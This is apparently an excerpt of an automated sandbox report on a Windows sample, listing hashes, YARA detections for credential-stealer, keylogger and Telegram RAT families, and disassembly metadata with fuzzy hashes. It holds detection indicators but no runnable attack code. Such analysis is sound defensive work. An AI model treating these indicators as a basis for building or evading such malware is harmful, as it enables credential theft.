Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:44:02
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Imagebase:	0xd90000
File size:	684'032 bytes
MD5 hash:	401098A467FC699ACB2D256DA47FDACE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	07:44:05
Start date:	26/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	44
Total number of Limit Nodes:	5

Executed Functions

Function 0AB106A8 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fb667e1c3bcda758844ecb262bc246ea0ff193e3f2867ca1e45af706c6dd07b
Instruction ID: a577964a05506cb019464f16fcd4a97ac445019b524ec3f8f388ac5c4bae4356
Opcode Fuzzy Hash: 0fb667e1c3bcda758844ecb262bc246ea0ff193e3f2867ca1e45af706c6dd07b
Instruction Fuzzy Hash: 6051F371E056199BEB28DFA6C8447E9FBF6BF89300F5481EAD409A6250EB701A85DF40

Function 0308B0A8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0308B2FE

Memory Dump Source

Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 37fb948168860d558b231beb192173d0042a56d67110604f32d914498ebe1612
Instruction ID: 8fd405b7b0082997a8283afab40c7f10a032f56771acf398e64b492ef3a66cc8
Opcode Fuzzy Hash: 37fb948168860d558b231beb192173d0042a56d67110604f32d914498ebe1612
Instruction Fuzzy Hash: B5714870A01B058FDB64EF2AD44179BBBF1FF88604F04892DD48ADBA50D775E846CB91

Function 0308590C Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 030859C9

Memory Dump Source

Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 77438676d470b47ca2a319f33e4165f433e8530ca10e075f54b27e9661b15d5d
Instruction ID: 08bee98c7ef5f0402d9cc40adbc9cb711452c9b291e886c6c6566ec49c627950
Opcode Fuzzy Hash: 77438676d470b47ca2a319f33e4165f433e8530ca10e075f54b27e9661b15d5d
Instruction Fuzzy Hash: 0041DDB1C017198BDB24DFA9C884BDEBBF5BF49304F24806AD448AB251DB756946CF90

Function 030844B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 030859C9

Memory Dump Source

Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 48e81abc00675616c464884f228b29d668744f8d3defdb2cf9f1bac07057ca1b
Instruction ID: 7ea8fa23421e4145dd2b2babb7a137a5bca015d166321863d7ffad1c16796607
Opcode Fuzzy Hash: 48e81abc00675616c464884f228b29d668744f8d3defdb2cf9f1bac07057ca1b
Instruction Fuzzy Hash: 5C41CEB1C01729CBDB24DFA9C884BCEBBF5BF49304F24846AD448AB251DB756946CF90

Function 0308D0B8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0308D54E,?,?,?,?,?), ref: 0308D60F

Memory Dump Source

Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cc5b6b82997b5bb442fefe66ce8d40359196bc427843e726d79496dbe519d397
Instruction ID: 166b43cf18b4a4114efde8d9bca44ecd3cfe3fde95133bd51a903c9bf00b714a
Opcode Fuzzy Hash: cc5b6b82997b5bb442fefe66ce8d40359196bc427843e726d79496dbe519d397
Instruction Fuzzy Hash: 052103B5D012089FDB10DFAAD884AEEFBF4EB48310F14841AE958A3350D378A950CFA5

Function 0308D581 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0308D54E,?,?,?,?,?), ref: 0308D60F

Memory Dump Source

Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a1aaa5bde2af330bfbb6ff2563a43a5df1de8262de1cf0bb297352044ff6f880
Instruction ID: d56bc118e1078d3dcbbf5a424c32d03088a8410ce7c11047268b7fbf323c3729
Opcode Fuzzy Hash: a1aaa5bde2af330bfbb6ff2563a43a5df1de8262de1cf0bb297352044ff6f880
Instruction Fuzzy Hash: D521E4B5D012089FDB10DFAAD984ADEFBF4FB48314F14841AE958A3350D378A950CFA5

Function 0308B298 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0308B2FE

Memory Dump Source

Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 531d036cd02ac16b0440b9e80362e6a0b2c0301baf98d6db2f5781e9f36b3110
Instruction ID: 0509983cc97b9c6a4f06bf052c65e806ed62e84909fbcf94ccaba665697a9c05
Opcode Fuzzy Hash: 531d036cd02ac16b0440b9e80362e6a0b2c0301baf98d6db2f5781e9f36b3110
Instruction Fuzzy Hash: C311E0B6C006498FDB24DF9AC444BDEFBF4AF88324F14841AD469A7610C379A545CFA5

Function 0AB11760 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0AB117BD

Memory Dump Source

Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6aa8cf82b7fb47d9956338bfb7b633c136e4983e51b4cb4d30254a3420639911
Instruction ID: ece6b7b27410a7781902a83c4a3ec016b9df7133405395a6d428d5065c0eedf7
Opcode Fuzzy Hash: 6aa8cf82b7fb47d9956338bfb7b633c136e4983e51b4cb4d30254a3420639911
Instruction Fuzzy Hash: B41103B58003489FDB20CF9AD884BDEBBF8EB48310F10841AE518A7700C379A544CFA5

Function 0AB11758 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0AB117BD

Memory Dump Source

Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: aa56efd9efb65317223eaa2a123f55093eaa789a7bc61fe88e6ee419019151d1
Instruction ID: 301b0a45018817d1083e726b9e7ebd073729492675743f71b004a2aa8c43de94
Opcode Fuzzy Hash: aa56efd9efb65317223eaa2a123f55093eaa789a7bc61fe88e6ee419019151d1
Instruction Fuzzy Hash: 761106B98003588FDB10CF99D585BDEBBF4FB48320F10855AD524A7750C379A544CFA5

Function 0198D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1266695594.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_198d000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2cfa185c0523f72dac286b381bd5e6f656932ac7c25110785566c9b0787bb2c
Instruction ID: 7706555ea6087b856fbd0a2ef0147c6773950bc22cdaaca3de38dec34fa25acd
Opcode Fuzzy Hash: e2cfa185c0523f72dac286b381bd5e6f656932ac7c25110785566c9b0787bb2c
Instruction Fuzzy Hash: 9A210671504204EFDF15EF94D9C0F26BBA5FB88320F20C569ED090B286C336D416CBA1

Function 02FBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267051520.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fbd000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a43cfef3210e9e5e3427e6e424ab9ff39b904571b67e1c2e2ff8cd927c21f9af
Instruction ID: df662180848f770e4b26dc0ab38e2dfd6535b703198394fd3a6c29cdc026c781
Opcode Fuzzy Hash: a43cfef3210e9e5e3427e6e424ab9ff39b904571b67e1c2e2ff8cd927c21f9af
Instruction Fuzzy Hash: A7212575A04300DFDB15DF20D9C0B56BBA1FF84794F20C56DEA0A0B24AC336D447CA62

Function 02FBD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267051520.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fbd000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14dee7c0fe9498bc16049aee0feb5cd64c13ea7c789d0e45904c5fb579ac346c
Instruction ID: cc89cef8b52855e01df78d80cd81b6afcd8da399be48a1fbb7a6343cab099da4
Opcode Fuzzy Hash: 14dee7c0fe9498bc16049aee0feb5cd64c13ea7c789d0e45904c5fb579ac346c
Instruction Fuzzy Hash: 5F218E755093808FCB13CF20D994755BF71EF46214F28C5EAD9498F6A7C33A980ACB62

Function 0198D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1266695594.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_198d000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171fa7ccdf6541722990f4edf01c7d65a556f79bcbf286ad7868c20aa591fdff
Instruction ID: 4b8be4531fc9b7ce7f9ab0287065e54047cf85fcfd4dc2954facf1aee81de840
Opcode Fuzzy Hash: 171fa7ccdf6541722990f4edf01c7d65a556f79bcbf286ad7868c20aa591fdff
Instruction Fuzzy Hash: 9221DF76404244CFDB16DF54D9C4B16BFB2FB84324F24C6A9DD084B696C33AD426CBA1

Function 0198D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1266695594.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_198d000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be2d89373b0d997e62cfb2e3be12d4718ba8c33655d2140fa44fded60e75a41
Instruction ID: c20357b7a357adc48596b0ee2b693e317a7a27375bdffcd044e9493a2c843d35
Opcode Fuzzy Hash: 0be2d89373b0d997e62cfb2e3be12d4718ba8c33655d2140fa44fded60e75a41
Instruction Fuzzy Hash: D001F7B1404384ABF7207E65CD84B66BBDCDF40225F188419ED0D4F2C2C6389840CAB6

Function 0198D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1266695594.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_198d000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f7b307a81df1faf2659638948a5d7c07be46d2434e3a21f9a6504e8c203cf3
Instruction ID: d58b96a4189e10ac9acb9ebfa61db6e02539f65a5d1cad0dff57765b16c59278
Opcode Fuzzy Hash: e5f7b307a81df1faf2659638948a5d7c07be46d2434e3a21f9a6504e8c203cf3
Instruction Fuzzy Hash: 7CF062B1404384AFE7249E1AC984B66FFDCEB85675F18C55AED0C4F293C3799844CA71

Non-executed Functions

Function 0AB132C8 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aba2201c476315b05c6ff69fcbe8f63cfad6959b14c86101e451bc3da1b9114
Instruction ID: 6033450b20bfcc739c616f1a658c6a0d87780225be2778c21dc1d17967a21c60
Opcode Fuzzy Hash: 0aba2201c476315b05c6ff69fcbe8f63cfad6959b14c86101e451bc3da1b9114
Instruction Fuzzy Hash: 72D1BB717013008FDB69EF75C4907AEB7F6AF88600F9448AED1469F691EB35E902CB91

Function 0308DE4C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afe36141662b34dc16e83bf799b2731671150162ebc85035830e314993b07072
Instruction ID: d78d398f51e9ac6b417e6e3f62e13c236eda4ce336a740a605edef22d9dc1624
Opcode Fuzzy Hash: afe36141662b34dc16e83bf799b2731671150162ebc85035830e314993b07072
Instruction Fuzzy Hash: E3A17E36E1160A8FCF05EFB4D8805DEB7F2FF89300B1585AAE805AB265DB75E915CB40

Function 0AB10698 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec03380308418f63aa5a056dc961e38ef0431977ef97b4af9a658b71f74d3d9
Instruction ID: a705aa3da15a347c5057cebff47c4104ec431e2b9f6a1683219a846806503ac0
Opcode Fuzzy Hash: 8ec03380308418f63aa5a056dc961e38ef0431977ef97b4af9a658b71f74d3d9
Instruction Fuzzy Hash: 0B2197B1D056288AEB28DF678D447DDFAF6AFC9301F44C1EA850CA6265DB340A859F01

Analysis Process: VbcXXnmIwPPhh.exePID: 4888, Parent PID: 6212COMMON

Execution Graph

Execution Coverage:	16.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	45%
Total number of Nodes:	20
Total number of Limit Nodes:	1

Executed Functions

Function 0168C738 Relevance: 7.7, Strings: 6, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0168C98F
d, xrefs: 0168C739
0oEp, xrefs: 0168C7AA
LjEp, xrefs: 0168C92D
PHq, xrefs: 0168C9A0
LjEp, xrefs: 0168C917

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq$d
API String ID: 0-3545145761
Opcode ID: 78915fcbf9ff3d49f0d1364ab341659a5c5150d8fdad989e531b469f39460bca
Instruction ID: cf39b45903a4f761c8267e428f2196f9744ce2aa0b2d67446a9c65d8b5790891
Opcode Fuzzy Hash: 78915fcbf9ff3d49f0d1364ab341659a5c5150d8fdad989e531b469f39460bca
Instruction Fuzzy Hash: 9581D474E00218DFEB14DFAAD984A9DBBF2BF88310F14C169E419AB365DB349945CF60

Function 0168C146 Relevance: 6.5, Strings: 5, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0168C400
LjEp, xrefs: 0168C38D
PHq, xrefs: 0168C3EF
0oEp, xrefs: 0168C20A
LjEp, xrefs: 0168C377

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 6c30f73fa55742aaae399ff1d1cc3b8d571a17d92a5bfe5d9bca700fd9d16c95
Instruction ID: 408dcbf8556934dcd8e4ccd46f8d3245a2196641be0f526e379db805cad7285a
Opcode Fuzzy Hash: 6c30f73fa55742aaae399ff1d1cc3b8d571a17d92a5bfe5d9bca700fd9d16c95
Instruction Fuzzy Hash: 43A10B74E00218CFEB14DFA9D884A9DBBF2FF89310F148169E419AB365DB309946CF61

Function 01685362 Relevance: 6.4, Strings: 5, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oEp, xrefs: 016853E2
LjEp, xrefs: 01685566
PHq, xrefs: 016855C8
PHq, xrefs: 016855D9
LjEp, xrefs: 01685550

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 20fe63183499ac9497b5bc741333a346bcfd27ffd62a311aa8cc23beaac818a5
Instruction ID: c8e5ef731aae47eff981238aee798f15854310a5361305f79cb7108c35f8ed83
Opcode Fuzzy Hash: 20fe63183499ac9497b5bc741333a346bcfd27ffd62a311aa8cc23beaac818a5
Instruction Fuzzy Hash: AD91D474E00218CFEB14DFAAD884A9DBBF2BF89310F14C169D409AB365DB349945CF51

Function 0168C468 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjEp, xrefs: 0168C647
LjEp, xrefs: 0168C65D
PHq, xrefs: 0168C6D0
PHq, xrefs: 0168C6BF
0oEp, xrefs: 0168C4DA

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 842c12e154425f2c66bb4964d0c6d952bed70673234c90e449b8f3b0e071fc44
Instruction ID: 8d2b66512909871c9eda08b1feb40f067efb54f65223fa673ac048f6ea837c28
Opcode Fuzzy Hash: 842c12e154425f2c66bb4964d0c6d952bed70673234c90e449b8f3b0e071fc44
Instruction Fuzzy Hash: B781F674E00218CFEB14DFAAD884A9DBBF2BF88300F14C169D419AB365DB349985CF61

Function 0168CA08 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oEp, xrefs: 0168CA7A
LjEp, xrefs: 0168CBFD
LjEp, xrefs: 0168CBE7
PHq, xrefs: 0168CC5F
PHq, xrefs: 0168CC70

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 289a10eb68ce5eeae68ef1c242469df5f8fd2843bd95c90afd699fbd11678694
Instruction ID: 67c3fe80815a3d08cdfb0bc0e631efcbcef377eb0561955427db77bb842bc129
Opcode Fuzzy Hash: 289a10eb68ce5eeae68ef1c242469df5f8fd2843bd95c90afd699fbd11678694
Instruction Fuzzy Hash: AB81D374E00218CFEB14DFAAD884A9DBBF2BF88310F14C169E819AB365DB349945CF50

Function 0168D278 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjEp, xrefs: 0168D457
LjEp, xrefs: 0168D46D
PHq, xrefs: 0168D4CF
0oEp, xrefs: 0168D2EA
PHq, xrefs: 0168D4E0

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: bfaa236f9037da7c706a116645217486963a2823ed3afad20a14a29067eb3c4a
Instruction ID: 4fa6e4ccbc1257deb4f8056e9bca593c831a56e2ed2ef466548c11ff30ef84f4
Opcode Fuzzy Hash: bfaa236f9037da7c706a116645217486963a2823ed3afad20a14a29067eb3c4a
Instruction Fuzzy Hash: 4B81D474E01218DFEB14DFAAD984A9DBBF2BF89300F14C169E419AB365DB349945CF20

Function 0168CCD8 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0168CF40
LjEp, xrefs: 0168CECD
LjEp, xrefs: 0168CEB7
PHq, xrefs: 0168CF2F
0oEp, xrefs: 0168CD4A

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: c421fa08227e69d0941a3f4621fd8ab242a48c488331e568952d906353c6cba8
Instruction ID: 62f9338d03b0671ae8af9c04add9eb7d5944eb6f32aef3599cc5c0bb520c1ae5
Opcode Fuzzy Hash: c421fa08227e69d0941a3f4621fd8ab242a48c488331e568952d906353c6cba8
Instruction Fuzzy Hash: CC81C574E00218DFEB54DFAAD984A9DBBF2BF88300F14C169E419AB365DB349945CF50

Function 0168CFAB Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0168D1FF
PHq, xrefs: 0168D210
LjEp, xrefs: 0168D187
0oEp, xrefs: 0168D01A
LjEp, xrefs: 0168D19D

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 367f0807493ac6b001937c413d20ff35c8558a94556356e1a250d71c549de05d
Instruction ID: e221b440d1e1d046b1fe1401445e53937637be6fc2e2ce72e41c904841ed2d45
Opcode Fuzzy Hash: 367f0807493ac6b001937c413d20ff35c8558a94556356e1a250d71c549de05d
Instruction Fuzzy Hash: 8281C474E00218CFEB54DFAAD984A9DBBF2BF88310F14C169E419AB365DB349945CF10

Function 01687118 Relevance: 5.4, Strings: 4, Instructions: 375
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 01687298
(oq, xrefs: 01687220
,q, xrefs: 0168728A
(oq, xrefs: 01687212

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q
API String ID: 0-620556200
Opcode ID: 58cde5bebd94ccce0098bb1af8a40cdc81f6ceac686e026fe18f63550182e9a4
Instruction ID: 729577a9bfff8e459ee8bad71ae09f3cc784cfbdd1bd1da9ab79a16ff6f76cd6
Opcode Fuzzy Hash: 58cde5bebd94ccce0098bb1af8a40cdc81f6ceac686e026fe18f63550182e9a4
Instruction Fuzzy Hash: 8DF12C30A01119CFDB15DF69CC84AADBBF2BF48314F698169E905AB365DB30ED41CB51

Function 0168A088 Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

(oq, xrefs: 0168A518
4'q, xrefs: 0168AB13

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: (oq$4'q
API String ID: 0-1336004174
Opcode ID: 5f248f9bed055ffc5f0a1a8de556ed40f12edbd4a88095ea700052cc8d1c87cb
Instruction ID: 40f468cea3ce985395624178d305e141e5bdb030a31670598ab9434f4d8a6107
Opcode Fuzzy Hash: 5f248f9bed055ffc5f0a1a8de556ed40f12edbd4a88095ea700052cc8d1c87cb
Instruction Fuzzy Hash: E7827F71A00209DFCB15DFA8C984AAEBBF2FF88310F15865AE9059B365D730ED91CB51

Function 06DF9548 Relevance: 3.4, APIs: 2, Instructions: 357
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DF95E0

Memory Dump Source

Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd

Similarity

